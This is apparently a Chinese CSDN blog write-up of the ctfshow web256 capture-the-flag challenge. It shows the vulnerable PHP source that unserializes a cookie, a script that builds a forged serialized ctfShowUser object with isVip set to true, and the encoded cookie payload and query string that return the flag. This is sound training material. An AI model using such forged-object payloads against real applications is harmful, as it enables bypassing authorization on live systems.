ctfshow-web256(反序列化)

最新推荐文章于 2024-10-20 21:54:32 发布
最新推荐文章于 2024-10-20 21:54:32 发布
阅读量683 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/123061562
该博客讨论了PHP中类的序列化和反序列化过程,展示了如何通过构造特定的序列化数据来绕过权限检查获取flag。作者提供了一个包含用户登录验证和VIP特权的类`ctfShowUser`,并通过示例展示了如何设置cookie来模拟VIP用户以获取flag。博客内容涉及到安全性和代码漏洞利用,特别是关于PHP的序列化漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

序列化 

<?php
class ctfShowUser{
    public $isVip=true;
    public $username='a';
	public $password='b';
}
echo urlencode(serialize(new ctfShowUser()));
O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3Bs%3A8%3A%22username%22%3Bs%3A1%3A%22a%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%22b%22%3B%7D

?username=a&password=b

Cookie:user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3Bs%3A8%3A%22username%22%3Bs%3A1%3A%22a%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%22b%22%3B%7D
m0_62094846
关注
CTFshow 反序列化 web256
Kradress的博客
12-19 499
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: [email protected] # @link: https://ctfer.com */ error_reporting(0); highlight
【CTF-WEB基础】ctfshow-web入门-257—反序列化
yu_fly_fish的博客
08-14 274
一起加油!
ctfshow反序列化web256
m0_62584974的博客
04-22 398
反序列化 Web256 题目有判断password和username相不相等 判断了才进行反序列化 <? //ctfshow 反序列化web256 class ctfShowUser{ public $username='1'; public $password='2'; public $isVip=ture; public function checkVip(){ return $this->isVip; }
ctfshow-web入门-反序列化web254-web258)
Welcome To Myon'Blog !
10-18 1709
通过反射调用私有变量。这里 code 和 class 都成了公有变量,我们可以直接访问到,只是增加了正则过滤,匹配的是大小写 o 或者 c:数字: 这种形式的内容,我们在数字前添加 + 绕过。
ctfshow web255 web 256 web257
姜小孩的博客
07-02 1844
目录web255web256附代码 整体的思路和上一题差不多只是多了一句 可以看到unserialize就是反序列化,所以需要我们序列化一些东西,通过cookie的user变量传入,改变这个数据。 这段代码无法让isVip为true,所以我们就需要通过user这个变量改变isVip的值。直接把类拿过来,只有类和变量会被反序列化,其他都可以去掉。 所以参入参数就是拿到flag,债见!!附代码 ​ 这个题的关键点在于username和password不相等,因为都是强比较,所以我们传入
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1978
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
CTFSHOW-WEB入门-反序列化(笔记)
A10ng_的博客
04-14 2918
web254 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: [email protected] # @link: https://ctfer.com */ error_reporting(0); highlight_file(__
ctfshow(254-256)--反序列化漏洞--认识序列化与反序列化
最新发布
m0_56019217的博客
10-20 680
阅读源代码也有了一定难度。从事网络安全,编程能力永远是我们的内功。
ctfshow-web入门-反序列化(前篇)
ccfly1012的博客
10-24 6288
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
ctfshow-web255(反序列化)
m0_62094846的博客
02-23 857
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: [email protected] # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__.
ctfshow web入门 反序列化
2301_79442654的博客
03-24 802
分析代码:如果用户名和密码参数都存在,脚本会创建一个类的实例$user。接着,调用方法尝试登录。如果登录成功(即用户名和密码与类中的默认值匹配),并且用户被标记为VIP($isVip为true),则调用方法输出$flag的值。如果登录失败或用户不是VIP,脚本将输出 "no vip, no flag"。要让程序返回true需要确保通过GET请求传递的用户名和密码与 ctfShowUser 类中定义的默认用户名和密码相匹配。默认的用户名和密码都是 'xxxxxx'。
ctfshow web入门反序列化 web254-257
m0_62207170的博客
04-21 679
ctfshow web入门反序列化 web254-257
ctfshow web入门 php序列化 web260--web266
2301_81040377的博客
05-06 442
在前面加上 ‘|’, 这样的话 session 反序列化的时候 php handler 会默认把 ‘|’ 前面的内容当做 key, 不会解析, ‘|’ 后面的才是真正应该反序列化的 value。注意heckbar是不能直接传值的,必须传键值对,所以我们用bp发包。注意数清楚fuck的个数,我就是少了一个。正则看序列化之后的ctfshow有没有。构造password=token即可。这里有两种写法,赋值的时候注意一定要。类名不能是ctfshow,然后。我们在POST传的值就是$cs。是拼接,然后就有马了。
ctfshow 反序列化1
qq_61768489的博客
03-06 1422
web254 主要是考察能不能看懂这个类,跟反序列化没关系 payload:/?username=xxxxxx&password=xxxxxx error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; //这里定义了属性值 public $password='xxxxxx'; public...
ctfshow254-278(代码审计,反序列化)
qq_37561898的博客
01-22 2705
ctfshow254-278(代码审计,反序列化),ctfshow web
反序列化漏洞
weixin_74427106的博客
04-08 87
反序列化:从序列化中提取信息,将有序字节流转换成对象的过程;分析代码可得这里只需要password=username即可。序列化:将对象的状态信息转化为可以存储或者传输的形式过程。
[CTFSHOW]反序列化(仅更新必要的题目)
Y4tacker的博客
12-02 4948
文章目录前言web254-web256web257 前言 新的篇章师傅们加油鸭 web254-web256 有空补上 web257 代码审计,魔法函数 __construct当对象被创建的时候自动调用,对对象进行初始化。当所有的操作执行完毕之后,需要释放序列化的对象,触发__destruct()魔术方法 <?php error_reporting(0); highlight_file(__FILE__); class ctfShowUser{ private $username='xxxxx
ctfshowweb入门—反序列化
2301_80337881的博客
03-24 1152
别看上面乌拉乌拉一大堆,实际上就是要检测你传入的username和password和类中定义的username和password一不一样。所以直接get传参就可以了。
CTFshow-反序列化
qq_61376069的博客
01-29 644
CTFshow入门—反序列化。 加号绕过正则: /[oc]:\d+:/i;
ctfshow 反序列化
m0_62422842的博客
07-07 2885
涉及到的题目是web254~web266
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值